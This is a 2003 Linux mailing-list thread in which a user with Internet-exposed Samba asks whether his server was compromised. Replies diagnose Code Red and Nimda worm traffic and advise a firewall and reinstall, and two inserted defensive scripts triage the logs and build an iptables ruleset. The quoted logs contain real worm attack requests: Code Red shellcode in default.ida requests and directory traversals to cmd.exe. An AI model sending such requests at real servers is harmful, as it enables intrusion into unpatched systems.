Re: [SLE] Has someone hacked my server? Has someone gotten root on my machine?
Thanks for all the replies. This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow caused some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box? In a number of replies people talk about a cracker, eh, what is a cracker? And what is the difference from a hacker?

From: "Derek Fountain"
Do you have any reason to believe a hardware fault has occured? Any history of overheating with that box? Has it received a knock recently which might have dislodged some memory? Any reason to think the hard disk might have started to die?
I have no reason whatsoever to suspect a hardware problem. No knocks, overheating etc.
A reinstall looks like the best option in the absence of any better advice. My suspicions would lie with the hardware though. Happily running Linux boxes don't just go belly up like that without a good reason.
I think that I will reinstall the machine.

Rohit writes:
I would have looked at /var/log/ directory and in relevant files there.
Thanks for this, would you suggest which file I should look at?
I looked at my mail log and guess what?
There is a huge hole in the log, everything from April 21 to 29 is gone.
Mail was running during that time.
Apparently deleted (???). Here is a snip of the log:
[snip]
Apr 21 18:00:34 linux sendmail[6307]: h3LG0Yd3006306: to=
I may be late on this, don't know if somebody already said this... But your apache log file indicates an "IIS ISAPI Overflow IDA" attack. This is an attack that exploits an IIS vulnerability. Unless you are running IIS on your Linux box, it's not doing your system any harm. :-) See http://www.whitehats.com/IDS/552 <snip>
[snip]
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
208.25.133.10 - - [21/Apr/2003:17:43:13 +0200] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:54 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:55 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:32:59 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:01 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.192.110.35 - - [21/Apr/2003:18:33:02 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
193.109.122.5 - - [21/Apr/2003:18:51:24 +0200] "CONNECT 193.109.122.7:2048/ HTTP/1.1" 400 340
80.224.123.79 - - [21/Apr/2003:20:40:23 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:14 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:17 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:18 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:19 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.14.34.82 - - [21/Apr/2003:20:55:20 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.14.34.82 - - [21/Apr/2003:20:55:21 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
80.201.159.40 - - [21/Apr/2003:21:52:29 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629
80.62.154.229 - - [21/Apr/2003:22:38:13 +0200] "GET /personal/ HTTP/1.1" 401 477
[/snip]
I very very strongly encourage you to look at the book "Real World Linux Security - 2nd Ed." by Bob Toxen (ISBN 0-13-046456-2) - released in the past few months. All your questions, and a whole lot more, are answered. It also contains step-by-step howtos on hardening, and why.
On Thu, May 01, 2003 at 06:17:03PM +0200, netops@tdcadsl.dk wrote:
Thanks for all the replies. This email contains snips of my log files. There is some interesting reading, particularly the messages log. It seems a samba string overflow caused some problems from April 21 to 29 - scroll down to see the logs. Does this mean that a hacker has gotten control of my box?
In a number of replies people talk about a cracker, eh, what is a cracker? And what is the difference from a hacker?
"Cracker" is the correct term for what you're calling a "Hacker". For a full definition:
http://www.catb.org/~esr/jargon/html/entry/cracker.html
http://www.catb.org/~esr/jargon/html/entry/hacker.html
No data seems to be missing from the apache access log on April 21 6pm - but there seems to be some kind of hacking attempt at that time. Here is a snip of that log:
80.235.135.50 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 629 [snip]
Looks like lots of attempts from Nimda/CodeRed and/or variants. These worms also attempt to propagate via SMB, so they might be the cause of the samba log file as well.

--
David Smith
Work Email: Dave.Smith@st.com
STMicroelectronics
Home Email: David.Smith@ds-electronics.co.uk
Bristol, England
GPG Key: 0xF13192F2
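The Code Red and Nimda request patterns that Hans and David point to above can be triaged mechanically rather than by eye. The script below is an added example, not code from this thread or from any project named in it: it reads Apache access-log lines on stdin, tallies hits per source address by worm family (`/default.ida?` for Code Red, `cmd.exe`/`root.exe` for Nimda), and flags any such request that received a 2xx/3xx status. The 404 and 400 replies in Dan's log mean Apache had nothing at those paths; a served response would be the thing worth a closer look. The log lines inside `sample_log` are constructed for this example and use documentation IP addresses.

```shell
#!/bin/sh
# Added example, not from the thread: triage an Apache access log for the
# Code Red / Nimda request patterns quoted above.

# classify_worm_hits: read common/combined log lines on stdin, print one line
# per (source IP, worm family): ip family hits SERVED|rejected. "SERVED" means
# at least one such request got a 2xx/3xx status instead of the usual 404/400.
classify_worm_hits() {
    awk '
    {
        ip = $1
        n = split($0, q, "\"")          # q[2] = request line, q[3] = " status bytes"
        if (n < 3) next
        split(q[2], req, " ")           # req[1] = method, req[2] = path
        path = req[2]
        split(q[3], rest, " ")          # rest[1] = HTTP status code
        status = rest[1]
        family = ""
        if (index(path, "/default.ida?") == 1)        family = "codered"
        else if (tolower(path) ~ /(cmd|root)\.exe/)   family = "nimda"
        if (family == "") next
        key = ip SUBSEP family
        hits[key]++
        if (status ~ /^[23]/) served[key] = 1
    }
    END {
        for (k in hits) {
            split(k, kk, SUBSEP)
            printf "%s %s %d %s\n", kk[1], kk[2], hits[k], ((k in served) ? "SERVED" : "rejected")
        }
    }' | sort
}

# sample_log: constructed log lines (documentation addresses), shaped like the
# ones in the thread plus one line where a worm-style path was actually served.
sample_log() {
    cat <<'EOF'
203.0.113.9 - - [21/Apr/2003:16:32:22 +0200] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3 HTTP/1.0" 404 629
198.51.100.7 - - [21/Apr/2003:18:32:54 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 629
198.51.100.7 - - [21/Apr/2003:18:32:59 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 629
198.51.100.7 - - [21/Apr/2003:18:33:00 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
192.0.2.44 - - [22/Apr/2003:09:01:10 +0200] "GET /cgi-bin/cmd.exe?/c+dir HTTP/1.0" 200 1234
192.0.2.44 - - [22/Apr/2003:09:01:12 +0200] "GET /index.html HTTP/1.1" 200 5120
EOF
}

# triage_sample: run the classifier over the constructed sample.
# On a real box: classify_worm_hits < /var/log/httpd/access_log
triage_sample() {
    sample_log | classify_worm_hits
}

triage_sample
```

The only line that deserves attention in the sample output is the one marked SERVED: every 404/400 is the web server correctly refusing a path that exists only on IIS, while a 200 for a `cmd.exe` path on an Apache box means something is actually answering at that location.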
"Cracker" is the correct term for what you're calling a "Hacker".
If we are getting technical, shouldn't the name of this list be "suse-gnulinux-e"? (I don't think a "/" in a group name would be appropriate, would it?) Sorry, I just couldn't resist throwing that in. I try to explain the cracker/hacker and the linux vs gnu/linux thing to whoever will listen myself. Well, to anyone who uses either term when they mean the other anyhow.

--
John LeMay KC2KTH
Senior Enterprise Consultant
NJMC | http://www.njmc.com | Phone 732-557-4848
Specializing in Microsoft and Unix based solutions
The 03.05.01 at 18:17, Dan Eskildsen wrote:
Here is a snip from the samba log file (log.smbd). I don't understand all of this, but there was activity on April 21 around 18pm. I don't recognise these IP addresses.
Do you mean you have samba open to the internet? Why / What for? Another question: Do you have the firewall enabled? If you don't, after reinstalling the machine enable it and close every port to the internet you don't really need to be open from outside.

--
Cheers, Carlos Robinson
Here is a snip from the samba log file (log.smbd). I don't understand all of this, but there was activity on April 21 around 18pm. I don't recognise these IP addresses.
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machines had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( So I set up samba to do that.
Another question: Do you have the firewall enabled? If you don't, after reinstalling the machine enable it and close every port to the internet you don't really need to be open from outside.

--
Cheers, Carlos Robinson
-- Check the headers for your unsubscription address For additional commands send e-mail to suse-linux-e-help@suse.com Also check the archives at http://lists.suse.com Please read the FAQs: suse-linux-e-faq@suse.com
The 03.05.02 at 02:19, Dan Eskildsen wrote:
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machines had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( So I set up samba to do that.
Ah... I understand. But it also means that all those three machines are open to the Internet, unless each one has its own firewall. It can be a nightmare... Perhaps you should add a standalone firewall to the outside. And you should check the other machines for intrusion as well.

--
Cheers, Carlos Robinson
Do you mean you have samba open to the internet? Why / What for?
I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machines had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( So I set up samba to do that.
So all your boxes are open to the 'net. That's bad. Really bad. You've already seen in the logs the battering the thing has taken from script kiddies and automated cracking programs. It's only the fact it's not a Windows box running IIS which let it go as long as it did.

Given this information, I'd reassess my position: it's quite likely a cracker has been in there. I'm still not convinced that's the source of your problems, but it's definitely possible.

Given this now realistic possibility, there's only one thing to do: get the data off it, taking *nothing executable* as you do so, and do a complete reformat and reinstall. Don't reconnect to the 'net until you have a firewall solution of some sort in place. Oh, and you might want to check the other machines on your network - if one has been cracked it's likely the rest have too.

--
"...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
Thanks all for the help.

Can I ask one really dumb question? How can I check whether the other machines on the network (win2k machines) have been cracked?

Regards from Denmark,
Dan

----- Original Message -----
From: "Derek Fountain"

Do you mean you have samba open to the internet? Why / What for?

I have three computers that are all connected via a switch, and the switch is connected to the net, so all the machines had a direct internet connection. I wanted to transfer files between the one win2k machine and the linux box. :-( So I set up samba to do that.

So all your boxes are open to the 'net. That's bad. Really bad. You've already seen in the logs the battering the thing has taken from script kiddies and automated cracking programs. It's only the fact it's not a Windows box running IIS which let it go as long as it did.

Given this information, I'd reassess my position: it's quite likely a cracker has been in there. I'm still not convinced that's the source of your problems, but it's definitely possible.

Given this now realistic possibility, there's only one thing to do: get the data off it, taking *nothing executable* as you do so, and do a complete reformat and reinstall. Don't reconnect to the 'net until you have a firewall solution of some sort in place. Oh, and you might want to check the other machines on your network - if one has been cracked it's likely the rest have too.

--
"...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
On Fri, May 02, 2003 at 11:39:19AM +0200, Dan Eskildsen wrote:
Thanks all for the help.
Can I ask one really dumb question? How can I check whether the other machines on the network (win2k machines) have been cracked?
With all the noise in your linux-box's logs, and the fact that your W$-boxes are exposed to the 'net'... I would personally just assume that they *were*... I have no idea how to check that on any kind of windows, but in any case you stand little or no chance of 'cleaning' up infected systems. I'd suggest something like this:

1: Get all the machines off the net
2: Backup your data
3: Build a dedicated firewall of whatever Pentium-class hardware you have and install LEAF/Bering on it: http://leaf.sourceforge.net/mod.php?mod=userpage&menu=904&page_id=21
4: Reinstall *all* your machines
5: Return to normal

It may seem a little harsh, but well... ;)
Regards from Denmark,
Tak :)

HTH
Jon Clausen

P.S. Please trim the quotes... (deleted ~70 lines just now)

--
If we can't be free, at least we can be cheap!
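Carlos's advice to close every port that does not need to be reachable from outside, and step 3 of Jon's list, both come down to a default-deny packet filter in front of Samba. The script below is an added example, not from this thread and not from SuSE, Samba or LEAF: it prints an iptables-restore ruleset that accepts NetBIOS/SMB and ssh only from a LAN subnet and drops everything else unsolicited, prints a matching smb.conf `[global]` fragment so smbd itself refuses non-LAN hosts, and includes a small check that flags a rule accepting the SMB ports from anywhere, which is the configuration this thread is about. The subnet 192.168.1.0/24, the web port and the function names are assumptions for the example; nothing is applied unless you pipe the output into iptables-restore yourself.

```shell
#!/bin/sh
# Added example, not from the thread: generate (do not apply) a default-deny
# iptables ruleset that keeps Samba reachable from the LAN only.

# gen_rules LAN_CIDR [WEB_PORT]
# Prints an iptables-restore file: INPUT/FORWARD default DROP, loopback and
# established traffic accepted, ssh and the Samba ports (137/138 udp,
# 139/445 tcp) accepted only from LAN_CIDR, an optional public web port,
# and rate-limited logging of whatever is dropped.
gen_rules() {
    lan="$1"          # assumption: the LAN subnet, e.g. 192.168.1.0/24
    web="${2:-}"      # assumption: a public web port, empty to keep it closed
    cat <<EOF
*filter
:INPUT DROP [0:0]
:FORWARD DROP [0:0]
:OUTPUT ACCEPT [0:0]
-A INPUT -i lo -j ACCEPT
-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT
-A INPUT -s $lan -p tcp --dport 22 -j ACCEPT
-A INPUT -s $lan -p udp -m multiport --dports 137,138 -j ACCEPT
-A INPUT -s $lan -p tcp -m multiport --dports 139,445 -j ACCEPT
EOF
    if [ -n "$web" ]; then
        echo "-A INPUT -p tcp --dport $web -j ACCEPT"
    fi
    cat <<'EOF'
-A INPUT -m limit --limit 5/min -j LOG --log-prefix "fw-drop: " --log-level 4
COMMIT
EOF
}

# gen_smb_global LAN_PREFIX
# Samba-side restriction for smb.conf, so the daemon refuses hosts outside
# the LAN even if the packet filter is ever flushed. LAN_PREFIX is in
# Samba's dotted-prefix form, e.g. "192.168.1." (assumption for the example).
gen_smb_global() {
    cat <<EOF
[global]
    hosts allow = $1 127.
    hosts deny = ALL
EOF
}

# samba_exposed RULESET
# Succeeds (exit 0) if any rule accepts an SMB port with no source
# restriction, i.e. the exposed setup the thread describes.
samba_exposed() {
    printf '%s\n' "$1" | grep -E -- '--dports? [0-9,]*(139|445)' | grep -qv -- '-s '
}

# Usage on a real box, after reading the output:
#   gen_rules 192.168.1.0/24 80 | iptables-restore
#   gen_smb_global 192.168.1.  >> /etc/samba/smb.conf   (then restart smbd)
```

The two layers are deliberately redundant: the packet filter protects every service on the box, while `hosts allow`/`hosts deny` keep Samba closed to outsiders even on the day someone runs `iptables -F` to debug something. `samba_exposed` is the kind of check worth running against an existing ruleset before trusting it.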
Can I ask one really dumb question? How can I check whether the other machines on the network (win2k machines) have been cracked?
This isn't the place to ask that - the skillset on this list is Linux/UNIX, not, for the most part, Windows. You'll need to find a decent Windows list or newsgroup, or failing that, hand over a pile of money to an 'expert'. Sounds like another lesson in what you can expect for free from Linux which you have to pay for under Windows. :o)

If I were you I'd be inclined to reformat and reinstall everything (all at once) and put it down to experience. Even if you haven't been cracked, the fact you've left your network exposed means you can't trust it anymore. Harsh lesson - you have my sincere sympathy.

--
"...our desktop is falling behind stability-wise and feature wise to KDE ...when I went to Mexico in December to the facility where we launched gnome, they had all switched to KDE3." - Miguel de Icaza, March 2003
participants (8)
- Carlos E. R.
- Dan Eskildsen
- Dave Smith
- Derek Fountain
- Hans Forbrich
- John LeMay
- Jon Clausen
- jrn@oregonhanggliding.com